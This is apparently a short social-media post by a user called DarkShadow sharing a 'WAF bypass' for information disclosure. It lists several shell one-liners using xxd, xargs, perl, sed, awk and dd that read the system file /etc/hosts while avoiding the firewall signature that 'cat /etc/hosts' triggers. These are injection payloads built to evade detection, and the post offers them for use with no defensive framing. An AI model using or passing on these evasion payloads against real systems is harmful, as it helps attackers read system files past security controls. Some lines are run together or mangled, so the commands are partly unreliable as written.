A WAF bypass for Information Disclosure vulnerability has been discovered using the payload 'cat /etc/hosts'. The bypass involves using various commands like xxd, xargs, perl, sed, awk, and dd on the '/etc/hosts' file to trigger the WAF. More details to follow in the next post by …DarkShadow…
Part-2
Crazy WAF Bypass:
cat /etc/hosts – triggers WAFxxd -p /etc/hosts | xxd -p -r
xargs -d 'n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null"More in next post"
For more follow …DarkShadow…— dark shadow (@darkshadow2bd) March 18, 2025